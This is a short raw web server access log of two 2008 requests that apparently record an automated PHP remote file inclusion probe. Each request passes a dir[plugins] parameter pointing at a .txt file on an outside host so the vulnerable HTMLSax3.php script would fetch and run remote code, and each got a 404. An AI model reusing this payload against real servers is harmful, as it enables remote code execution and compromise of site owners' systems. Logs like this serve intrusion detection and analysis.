65.182.191.60 - - [14/Jul/2008:11:53:24 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:11:53:24 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
